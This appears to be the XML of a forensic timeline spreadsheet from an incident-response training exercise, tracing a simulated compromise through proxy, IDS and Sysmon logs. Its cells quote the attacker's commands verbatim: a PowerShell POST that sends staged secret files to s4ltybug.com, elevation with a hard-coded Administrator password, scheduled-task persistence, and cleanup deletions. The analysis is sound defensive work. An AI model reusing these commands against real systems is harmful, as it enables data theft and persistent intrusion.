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579456b90812adf/Área de Trabalho/IRM/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="771" documentId="8_{003F7797-AA81-4001-9936-A205E161A416}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{D2D994FD-9872-4DB5-9A77-37C50B4D1CC1}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15720" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Color Timeline" sheetId="1" r:id="rId1"/>
    <sheet name="LEGEND" sheetId="2" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'Color Timeline'!$A$1:$Q$339846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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1120" uniqueCount="347">
  <si>
    <t>FILE OPENING</t>
  </si>
  <si>
    <t>WEB HISTORY</t>
  </si>
  <si>
    <t>DELETED DATA</t>
  </si>
  <si>
    <t>EXECUTION</t>
  </si>
  <si>
    <t>FOLDER OPENING</t>
  </si>
  <si>
    <t>LOG FILE</t>
  </si>
  <si>
    <t>DEVICE or USB USAGE</t>
  </si>
  <si>
    <t>DATE (UTC)</t>
  </si>
  <si>
    <t>USER</t>
  </si>
  <si>
    <t>HOSTNAME</t>
  </si>
  <si>
    <t>ARTIFACT</t>
  </si>
  <si>
    <t>WHAT HAPPENED</t>
  </si>
  <si>
    <t>SOURCE</t>
  </si>
  <si>
    <t>COMMENTS</t>
  </si>
  <si>
    <t>Proxy Logs</t>
  </si>
  <si>
    <t>IDS Logs</t>
  </si>
  <si>
    <t>Splunk-windows_sysmon</t>
  </si>
  <si>
    <t>Sysmon Logs</t>
  </si>
  <si>
    <t>acc-win10-16.site.lan</t>
  </si>
  <si>
    <t>Sysmon File Create Event</t>
  </si>
  <si>
    <t>S-1-5-18</t>
  </si>
  <si>
    <t>acc-win10-13.site.lan</t>
  </si>
  <si>
    <t>Event ID: 1 FileCreate Executableinfo TargetFilename c:\users\Public\QRCodeScanner.exe</t>
  </si>
  <si>
    <t>Event ID: 1 powershell ExecutableInfo: GET-Random Invoke-Rest Method -Uri http://s4ltybug.com/</t>
  </si>
  <si>
    <t>POST request sent to a domain to get a file</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>site-onion-sensor</t>
  </si>
  <si>
    <t>HTTP GET STATUS 200 - sodium.ca/QRCodeScanner.exe</t>
  </si>
  <si>
    <t>Suspect Domain get request to a .exe file</t>
  </si>
  <si>
    <t>ACC-WIN10-16 (172.16.6.116)</t>
  </si>
  <si>
    <t xml:space="preserve">src_ip=172.16.6.116 src_port=60485 dest_ip=3.64.168.50 dest_port=80 http_method=GET url="http://sodium.ca/QRCodeScanner.exe" </t>
  </si>
  <si>
    <t>Splunk-site_proxy</t>
  </si>
  <si>
    <t>User clicked link and downloaded malicious executable QRCodeScanner.exe using UserAgent UserAgent/1.0.</t>
  </si>
  <si>
    <t>liam.sherman</t>
  </si>
  <si>
    <t>Windows  Logs</t>
  </si>
  <si>
    <t>User unlock recorded (interactive session)</t>
  </si>
  <si>
    <t>User present prior to compromise</t>
  </si>
  <si>
    <t>First HTTP POST to C2/exfil domain</t>
  </si>
  <si>
    <t>First HTTP POST to C2/exfil domain saltybug.com (162.241.253.54)</t>
  </si>
  <si>
    <t>First PowerShell instance triggered by qrcodescanner.exe with -windowstyle hidden</t>
  </si>
  <si>
    <t>Execution stage initiated</t>
  </si>
  <si>
    <t>Successful interactive login</t>
  </si>
  <si>
    <t>System session likely active</t>
  </si>
  <si>
    <t>600,"68514,68514,2025-06-25 11:20:13.9103375,600,Info,PowerShell,Windows PowerShell,0,0,acc-win10-16.site.lan,107,,Provider is Started,,,""HostApplication=powershell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c:\users\Public\QRCodeScanner.exe -verb runas -windowstyle hidden}';echo 'success!'}"",""HostName=ConsoleHost"",""HostVersion=5.1.19041.1682"",,,,,False,E:\Student_Exercise_Scenario\ACC-WIN10-16\Logs\winevt\Logs\Windows PowerShell.evtx,0x80000000000000,0,""{""""EventData"""":{""""Data"""":""""Environment, Started, \tProviderName=Environment\n\tNewProviderState=Started\n\n\tSequenceNumber=5\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.1682\n\tHostId=772d3131-2593-4e47-b09f-9fcfe93dca1f\n\tHostApplication=powershell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c:\\users\\Public\\QRCodeScanner.exe -verb runas -windowstyle hidden}';echo 'success!'}\n\tEngineVersion=\n\tRunspaceId=\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine="""",""""Binary"""":""""""""}}"""</t>
  </si>
  <si>
    <t>Splunk-windows_logs</t>
  </si>
  <si>
    <t>600,"68513,68513,2025-06-25 11:20:13.9103375,600,Info,PowerShell,Windows PowerShell,0,0,acc-win10-16.site.lan,107,,Provider is Started,,,""HostApplication=powershell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c:\users\Public\QRCodeScanner.exe -verb runas -windowstyle hidden}';echo 'success!'}"",""HostName=ConsoleHost"",""HostVersion=5.1.19041.1682"",,,,,False,E:\Student_Exercise_Scenario\ACC-WIN10-16\Logs\winevt\Logs\Windows PowerShell.evtx,0x80000000000000,0,""{""""EventData"""":{""""Data"""":""""Alias, Started, \tProviderName=Alias\n\tNewProviderState=Started\n\n\tSequenceNumber=3\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.1682\n\tHostId=772d3131-2593-4e47-b09f-9fcfe93dca1f\n\tHostApplication=powershell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c:\\users\\Public\\QRCodeScanner.exe -verb runas -windowstyle hidden}';echo 'success!'}\n\tEngineVersion=\n\tRunspaceId=\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine="""",""""Binary"""":""""""""}}"""</t>
  </si>
  <si>
    <t>400,"68518,68518,2025-06-25 11:20:13.9259724,400,Info,PowerShell,Windows PowerShell,0,0,acc-win10-16.site.lan,107,,Engine state is changed from None to Available,,,""HostApplication=powershell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c:\users\Public\QRCodeScanner.exe -verb runas -windowstyle hidden}';echo 'success!'}"",""HostName=ConsoleHost"",""HostVersion=5.1.19041.1682"",,,,,False,E:\Student_Exercise_Scenario\ACC-WIN10-16\Logs\winevt\Logs\Windows PowerShell.evtx,0x80000000000000,0,""{""""EventData"""":{""""Data"""":""""Available, None, \tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.1682\n\tHostId=772d3131-2593-4e47-b09f-9fcfe93dca1f\n\tHostApplication=powershell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c:\\users\\Public\\QRCodeScanner.exe -verb runas -windowstyle hidden}';echo 'success!'}\n\tEngineVersion=5.1.19041.1682\n\tRunspaceId=fc550782-f258-4e60-8346-0c0c4ecaf046\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine="""",""""Binary"""":""""""""}}"""</t>
  </si>
  <si>
    <t>600,"68519,68519,2025-06-25 11:20:15.7807632,600,Info,PowerShell,Windows PowerShell,0,0,acc-win10-16.site.lan,107,,Provider is Started,,,""HostApplication=powershell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c:\users\Public\QRCodeScanner.exe -verb runas -windowstyle hidden}';echo 'success!'}"",""HostName=ConsoleHost"",""HostVersion=5.1.19041.1682"",,,,,False,E:\Student_Exercise_Scenario\ACC-WIN10-16\Logs\winevt\Logs\Windows PowerShell.evtx,0x80000000000000,0,""{""""EventData"""":{""""Data"""":""""Certificate, Started, \tProviderName=Certificate\n\tNewProviderState=Started\n\n\tSequenceNumber=15\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.1682\n\tHostId=772d3131-2593-4e47-b09f-9fcfe93dca1f\n\tHostApplication=powershell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c:\\users\\Public\\QRCodeScanner.exe -verb runas -windowstyle hidden}';echo 'success!'}\n\tEngineVersion=5.1.19041.1682\n\tRunspaceId=fc550782-f258-4e60-8346-0c0c4ecaf046\n\tPipelineId=12\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine="""",""""Binary"""":""""""""}}"""</t>
  </si>
  <si>
    <t>403,"68520,68520,2025-06-25 11:20:16.5089372,403,Info,PowerShell,Windows PowerShell,0,0,acc-win10-16.site.lan,107,,Engine state is changed from Available to Stopped,,,""HostApplication=powershell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c:\users\Public\QRCodeScanner.exe -verb runas -windowstyle hidden}';echo 'success!'}"",""HostName=ConsoleHost"",""HostVersion=5.1.19041.1682"",,,,,False,E:\Student_Exercise_Scenario\ACC-WIN10-16\Logs\winevt\Logs\Windows PowerShell.evtx,0x80000000000000,0,""{""""EventData"""":{""""Data"""":""""Stopped, Available, \tNewEngineState=Stopped\n\tPreviousEngineState=Available\n\n\tSequenceNumber=17\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.1682\n\tHostId=772d3131-2593-4e47-b09f-9fcfe93dca1f\n\tHostApplication=powershell &amp;amp;{$password = ConvertTo-SecureString 'Simspace1!Simspace1!' -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential ('Administrator', $password); start-process powershell -credential $credential -argumentlist '-noprofile -command &amp;amp;{Start-Process c:\\users\\Public\\QRCodeScanner.exe -verb runas -windowstyle hidden}';echo 'success!'}\n\tEngineVersion=5.1.19041.1682\n\tRunspaceId=fc550782-f258-4e60-8346-0c0c4ecaf046\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine="""",""""Binary"""":""""""""}}"""</t>
  </si>
  <si>
    <t>powershell execute by QRCODESCANNER</t>
  </si>
  <si>
    <t>400,"68527,68527,2025-06-25 11:20:17.2310769,400,Info,PowerShell,Windows PowerShell,0,0,acc-win10-16.site.lan,107,,Engine state is changed from None to Available,,,""HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -command &amp;amp;{Start-Process c:\users\Public\QRCodeScanner.exe -verb runas -windowstyle hidden}"",""HostName=ConsoleHost"",""HostVersion=5.1.19041.1682"",,,,,False,E:\Student_Exercise_Scenario\ACC-WIN10-16\Logs\winevt\Logs\Windows PowerShell.evtx,0x80000000000000,0,""{""""EventData"""":{""""Data"""":""""Available, None, \tNewEngineState=Available\n\tPreviousEngineState=None\n\n\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.1682\n\tHostId=af894bc8-144c-4cc5-8ef4-5aeda605a940\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noprofile -command &amp;amp;{Start-Process c:\\users\\Public\\QRCodeScanner.exe -verb runas -windowstyle hidden}\n\tEngineVersion=5.1.19041.1682\n\tRunspaceId=f3d0ab5c-eb28-4530-ad66-1a0d03ae3d15\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine="""",""""Binary"""":""""""""}}"""</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Command executed: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
      </rPr>
      <t>net config workstation</t>
    </r>
  </si>
  <si>
    <t>Host reconnaissance begins</t>
  </si>
  <si>
    <t>Alert: ET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND</t>
  </si>
  <si>
    <t>Splunk-IDS</t>
  </si>
  <si>
    <t>Command-line activity detected by IDS</t>
  </si>
  <si>
    <t>Outbound netstat alert</t>
  </si>
  <si>
    <t>Network recon detected</t>
  </si>
  <si>
    <t>ACC-WIN10-16 &gt; ACC-WIN10-13 First successful Network logon (Event ID 4624 - Logon Type 3)</t>
  </si>
  <si>
    <t>Payload copied/executed on second host</t>
  </si>
  <si>
    <t>Lateral movement begins</t>
  </si>
  <si>
    <t>Scheduled Task created: ThreadCleaner</t>
  </si>
  <si>
    <t>Persistence mechanism</t>
  </si>
  <si>
    <t>First Sysmon event related to qrcodescanner.exe</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">PowerShell commands reference files in </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
      </rPr>
      <t>C:\Windows\vss</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (secret1.file, secret2.file)</t>
    </r>
  </si>
  <si>
    <t>Sensitive file collection</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Robocopy command executed to </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
      </rPr>
      <t>\\acc-win10-13\C$\Windows\vss</t>
    </r>
  </si>
  <si>
    <t>Lateral movement data staging</t>
  </si>
  <si>
    <t>ET INFO Windows PowerShell User-Agent Usage alert triggered</t>
  </si>
  <si>
    <t>Outbound exfil preparation</t>
  </si>
  <si>
    <t>Invoke-RestMethod POST to s4ltybug.com (IP 162.241.253.54)</t>
  </si>
  <si>
    <t>Data exfiltration attempt</t>
  </si>
  <si>
    <r>
      <t>Powershell file deletion (</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
      </rPr>
      <t>secrets.txt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secrets.zip</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>)</t>
    </r>
  </si>
  <si>
    <t>Anti-forensics / cleanup</t>
  </si>
  <si>
    <t>More POST activity detected to s4ltybug.com</t>
  </si>
  <si>
    <t>Additional exfil detected</t>
  </si>
  <si>
    <t>Activity across both hosts to same malicious domain</t>
  </si>
  <si>
    <t>Confirms multi-host compromise</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=60485 dest_ip=3.64.168.50 dest_port=80 http_method=GET url="http://sodium.ca/QRCodeScanner.exe"</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=60487 dest_ip=162.241.253.54 dest_port=80 http_method=GET url="http://saltybug.com/register/acc-win10-16/windows" status=200</t>
  </si>
  <si>
    <t>First outbound connection to C2 domain saltybug.com from compromised host.</t>
  </si>
  <si>
    <t>src_ip=172.16.6.116 src_port=60493 dest_ip=162.241.253.54 dest_port=80 http_method=GET url="http://saltybug.com/register/acc-win10-16/windows" status=200</t>
  </si>
  <si>
    <t>Beaconing traffic to saltybug.com observed shortly after payload execution.</t>
  </si>
  <si>
    <t>ACC-WIN10-13 (172.16.6.113)</t>
  </si>
  <si>
    <t>src_ip=172.16.6.113 src_port=60883 dest_ip=162.241.253.54 dest_port=80 http_method=GET url="http://saltybug.com/register/acc-win10-13/windows" status=200</t>
  </si>
  <si>
    <t>Second host shows C2 communication, indicating lateral spread.</t>
  </si>
  <si>
    <t>Suspicious outbound POST request to saltybug.com on port 8080</t>
  </si>
  <si>
    <t>Likely C2 communication or exfiltration activity from compromised host</t>
  </si>
  <si>
    <t>Suspicious outbound POST request to saltybug.com on port 80</t>
  </si>
  <si>
    <t>Malware beaconing via proxy detected</t>
  </si>
  <si>
    <t>POST to saltybug.com with domain enumeration output</t>
  </si>
  <si>
    <t>User accounts enumeration from domain controller</t>
  </si>
  <si>
    <t>Outbound POST to C2 server via proxy</t>
  </si>
  <si>
    <t>Domain user listing likely exfiltrated</t>
  </si>
  <si>
    <t>POST to C2 containing local user accounts enumeration</t>
  </si>
  <si>
    <t>Local account enumeration from host</t>
  </si>
  <si>
    <t>Outbound POST to saltybug.com</t>
  </si>
  <si>
    <t>Possible account data exfiltration over HTTP</t>
  </si>
  <si>
    <t>POST to saltybug.com containing active connections list</t>
  </si>
  <si>
    <t>System reconnaissance — active network connections collected</t>
  </si>
  <si>
    <t>Outbound POST to saltybug.com over port 80</t>
  </si>
  <si>
    <t>Proxy relay of C2 traffic detected</t>
  </si>
  <si>
    <t>POST to C2 containing firewall configuration data</t>
  </si>
  <si>
    <t>Host firewall state and rules exfiltrated</t>
  </si>
  <si>
    <t>Beaconing via proxy — firewall configuration reconnaissance</t>
  </si>
  <si>
    <t>POST request to http://saltybug.com/update detected from 172.16.6.116 to 172.16.2.6:8080</t>
  </si>
  <si>
    <t>Outbound data exfiltration suspected</t>
  </si>
  <si>
    <t>POST request to http://saltybug.com/update detected, forwarded through site-proxy</t>
  </si>
  <si>
    <t>Proxy involvement indicates possible evasion</t>
  </si>
  <si>
    <t>Another POST request to saltybug.com detected, likely part of data exfil sequence</t>
  </si>
  <si>
    <t>Multiple rapid requests to same domain</t>
  </si>
  <si>
    <t>Repeated POST activity to saltybug.com via 172.16.2.6</t>
  </si>
  <si>
    <t>Persistence or automation suspected</t>
  </si>
  <si>
    <t>POST to http://saltybug.com/update with routing table details</t>
  </si>
  <si>
    <t>Network enumeration / host data exfiltrated</t>
  </si>
  <si>
    <t>POST to saltybug.com with route information (proxy involvement)</t>
  </si>
  <si>
    <t>Likely C2 data beaconing</t>
  </si>
  <si>
    <t>Large POST to saltybug.com carrying driver enumeration</t>
  </si>
  <si>
    <t>System driver list exfiltration</t>
  </si>
  <si>
    <t>Large POST to http://saltybug.com/update containing driver info via proxy</t>
  </si>
  <si>
    <t>C2 data channel established</t>
  </si>
  <si>
    <t>SYSTEM</t>
  </si>
  <si>
    <t>POST request to http://saltybug.com/update initiated</t>
  </si>
  <si>
    <t>site_proxy</t>
  </si>
  <si>
    <t>Initial exfiltration from compromised host</t>
  </si>
  <si>
    <t>Exfiltration begins from second compromised host</t>
  </si>
  <si>
    <t>Repeated POST to saltybug.com/update (status 200)</t>
  </si>
  <si>
    <t>Consistent beaconing activity observed</t>
  </si>
  <si>
    <t>HTTP POST communication with C2 domain</t>
  </si>
  <si>
    <t>Continuing exfiltration attempt</t>
  </si>
  <si>
    <t>Outbound POST request to saltybug.com/update</t>
  </si>
  <si>
    <t>C2 persistence confirmed</t>
  </si>
  <si>
    <t>POST to C2 domain continuing at regular intervals</t>
  </si>
  <si>
    <t>Exfiltration ongoing from second host</t>
  </si>
  <si>
    <t>POST request to saltybug.com/update successful</t>
  </si>
  <si>
    <t>Data upload consistent with exfil process</t>
  </si>
  <si>
    <t>POST request logged to saltybug.com/update</t>
  </si>
  <si>
    <t>Network connection stable and active</t>
  </si>
  <si>
    <t>HTTP POST request to C2 successful (200 OK)</t>
  </si>
  <si>
    <t>Persistent C2 communication detected</t>
  </si>
  <si>
    <t>POST to saltybug.com/update</t>
  </si>
  <si>
    <t>Exfiltration resumed from primary host</t>
  </si>
  <si>
    <t>site\liam.sherman</t>
  </si>
  <si>
    <t>ACC-WIN10-16\Administrator</t>
  </si>
  <si>
    <t>System variable enumeration</t>
  </si>
  <si>
    <t>Environment path reconnaissance</t>
  </si>
  <si>
    <t>Privilege escalation reconnaissance</t>
  </si>
  <si>
    <t>site\Administrator</t>
  </si>
  <si>
    <t>Data staging continues</t>
  </si>
  <si>
    <t>Ongoing data exfiltration</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine powershell &amp; {$password = ConvertTo-SecureString 'Simspace1!Simspace1!' -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential ('Administrator', $password); start-process powershell -credential $credential -argumentlist '-noprofile -command {Start-Process c:\users\Public\QRCodeScanner.exe -verb runas -windowstyle hidden}';echo 'success!'}</t>
  </si>
  <si>
    <t>Sysmon Process Create Event</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command {Start-Process c:\users\Public\QRCodeScanner.exe -verb runas -windowstyle hidden}</t>
  </si>
  <si>
    <t>Privilege escalation using PowerShell</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Users\Public\QRCodeScanner.exe CommandLine "C:\users\Public\QRCodeScanner.exe"</t>
  </si>
  <si>
    <t>QRCodeScanner.exe execution detected</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\cmd.exe CommandLine cmd /c dir</t>
  </si>
  <si>
    <t>Reconnaissance via 'dir' command</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\cmd.exe CommandLine cmd /c set</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\cmd.exe CommandLine cmd /c ver</t>
  </si>
  <si>
    <t>System version enumeration</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\cmd.exe CommandLine cmd /c path</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine powershell net groups 'Domain Computers' /domain</t>
  </si>
  <si>
    <t>Domain group enumeration</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine powershell net groups 'Domain Controllers' /domain</t>
  </si>
  <si>
    <t>Domain reconnaissance</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine powershell net groups 'Domain Admins' /domain</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\schtasks.exe CommandLine schtasks.exe /create /f /SC once /ST 23:59 /TN ThreadCleaner /TR C:\Windows\vss\QRCodeScanner.exe /RL highest /s acc-win10-13</t>
  </si>
  <si>
    <t>Scheduled task creation for persistence</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\cmd.exe CommandLine cmd /c copy c:\users\administrator\appdata\local\temp\QRCodeScanner.exe C:\Windows\vss\vixDiskMountServer.exe</t>
  </si>
  <si>
    <t>File copied for persistence</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine powershell {$action = New-ScheduledTaskAction -Execute 'C:\Windows\vss\vixDiskMountServer.exe'; Register-ScheduledTask -TaskName 'ThreadCleaner' -User 'System' -Force}</t>
  </si>
  <si>
    <t>Persistence via scheduled task</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine powershell {$files = Get-ChildItem c:\users -Recurse; Copy-Item -Path $files[0] C:\Windows\vss\secret1.file -Force}</t>
  </si>
  <si>
    <t>File staging for exfiltration</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine powershell {$files = Get-ChildItem c:\users -Recurse; Copy-Item -Path $files[1] C:\Windows\vss\secret2.file -Force}</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine powershell Invoke-RestMethod -Uri http://s4ltybug.com -Method Post -InFile secret1.file</t>
  </si>
  <si>
    <t>Data exfiltration via HTTP POST</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine powershell Invoke-RestMethod -Uri http://s4ltybug.com -Method Post -InFile secret2.file</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\cmd.exe CommandLine cmd /c del C:\Windows\vss\secrets.txt</t>
  </si>
  <si>
    <t>Cleanup - deleted secrets.txt</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate Executableinfo Image C:\Windows\System32\cmd.exe CommandLine cmd /c del C:\Windows\vss\secrets.zip</t>
  </si>
  <si>
    <t>Cleanup - deleted secrets.zip</t>
  </si>
  <si>
    <t>Event ID: 4648 LogonAttemptExplicitCredentials TargetServerName acc-win10-13 TargetUser SITE.LAN\Administrator IpAddress 172.16.6.113 ProcessName C:\Windows\System32\schtasks.exe</t>
  </si>
  <si>
    <t>Attempted explicit credential logon to acc-win10-13</t>
  </si>
  <si>
    <t>SITE.LAN\Administrator</t>
  </si>
  <si>
    <t>Event ID: 4624 SuccessfulLogon LogonType 3 AuthenticationPackageName Kerberos IpAddress 172.16.6.116</t>
  </si>
  <si>
    <t>Successful network logon from ACC-WIN10-16 to ACC-WIN10-13</t>
  </si>
  <si>
    <t>Remote Kerberos logon from compromised host ACC-WIN10-16</t>
  </si>
  <si>
    <t>Event ID: 4648 LogonAttemptExplicitCredentials TargetServerName acc-win10-13 TargetInfo cifs/acc-win10-13 IpAddress 172.16.6.113 ProcessName C:\Windows\System32\schtasks.exe</t>
  </si>
  <si>
    <t>Attempted file-share connection to acc-win10-13 (CIFS)</t>
  </si>
  <si>
    <t>Another explicit credential attempt via schtasks.exe</t>
  </si>
  <si>
    <t>Kerberos authentication success from acc-win10-16</t>
  </si>
  <si>
    <t>Event ID: 4648 LogonAttemptExplicitCredentials TargetServerName acc-win10-13 TargetUser SITE.LAN\Administrator ProcessName C:\Windows\System32\schtasks.exe</t>
  </si>
  <si>
    <t>Scheduled task authentication attempt to acc-win10-13</t>
  </si>
  <si>
    <t>Successful Kerberos network logon from acc-win10-16</t>
  </si>
  <si>
    <t>Event ID: 4648 LogonAttemptExplicitCredentials TargetServerName acc-win10-13 TargetInfo cifs/acc-win10-13 IpAddress 172.16.6.113 ProcessName System</t>
  </si>
  <si>
    <t>Multiple CIFS connection attempts to acc-win10-13</t>
  </si>
  <si>
    <t>Multiple Kerberos logons received from ACC-WIN10-16</t>
  </si>
  <si>
    <t>Event ID: 4648 LogonAttemptExplicitCredentials TargetServerName acc-win10-13 IpAddress 172.16.6.113 ProcessName System</t>
  </si>
  <si>
    <t>Continued credential usage attempts between hosts</t>
  </si>
  <si>
    <t>Repeating Kerberos logon sequence</t>
  </si>
  <si>
    <t>Redundant credential attempts over SMB</t>
  </si>
  <si>
    <t>Repeated Kerberos authentication from compromised host</t>
  </si>
  <si>
    <t>Persistent lateral movement activity</t>
  </si>
  <si>
    <t>Network logon succeeded (Kerberos, LogonType 3)</t>
  </si>
  <si>
    <t>site\rosemary.cortez</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate info Image C:\Windows\System32\reg.exe CommandLine reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /f /v 2500 /t REG_DWORD /d 0</t>
  </si>
  <si>
    <t>Registry modification via reg.exe executed from cmd.exe (likely policy bypass)</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate info Image C:\Windows\System32\reg.exe CommandLine reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2" /f /v 2500 /t REG_DWORD /d 0</t>
  </si>
  <si>
    <t>Modified IE security zone 2 via reg.exe</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate info Image C:\Windows\System32\reg.exe CommandLine reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" /f /v 2500 /t REG_DWORD /d 0</t>
  </si>
  <si>
    <t>Modified IE security zone 3 via reg.exe</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate info Image C:\Windows\System32\reg.exe CommandLine reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4" /f /v 2500 /t REG_DWORD /d 0</t>
  </si>
  <si>
    <t>Modified IE security zone 4 via reg.exe</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate info Image C:\Windows\System32\reg.exe CommandLine reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /f /v "Check_Associations" /t REG_SZ /d "no"</t>
  </si>
  <si>
    <t>Disabled IE file association checks via reg.exe</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - PowerShell executed with embedded credentials to elevate QRCodeScanner.exe</t>
  </si>
  <si>
    <t>Parent process: C:\Users\Public\QRCodeScanner.exe; CommandLine contains plaintext password and Start-Process -verb runas</t>
  </si>
  <si>
    <t>1742902,...powershell &amp;{$password = ConvertTo-SecureString 'Simspace1!Simspace1!' -AsPlainText -Force; ... Start-Process c:\users\Public\QRCodeScanner.exe -verb runas -windowstyle hidden ... }</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - Elevated PowerShell launched QRCodeScanner.exe as Administrator</t>
  </si>
  <si>
    <t>PowerShell parent process indicates credential use to start elevated process</t>
  </si>
  <si>
    <t>1742907,...ParentCommandLine: powershell &amp;{$password = ConvertTo-SecureString 'Simspace1!Simspace1!' -AsPlainText -Force; ... Start-Process c:\users\Public\QRCodeScanner.exe -verb runas ... }</t>
  </si>
  <si>
    <t>Event ID: 1 ProcessCreate - QRCodeScanner.exe executed with elevated privileges</t>
  </si>
  <si>
    <t>QRCodeScanner.exe now running as Administrator (Parent: PowerShell)</t>
  </si>
  <si>
    <t>1742909,..."C:\users\Public\QRCodeScanner.exe"</t>
  </si>
  <si>
    <t>Event ID: 3 Network Connection from QRCodeScanner.exe to site-proxy.site.lan (172.16.2.6:8080)</t>
  </si>
  <si>
    <t>TCP connection initiated by usermode process; likely C2 or proxy communication</t>
  </si>
  <si>
    <t>Elevated QRCodeScanner.exe established TCP connection to internal proxy</t>
  </si>
  <si>
    <t>Continued communication attempts from standard user session</t>
  </si>
  <si>
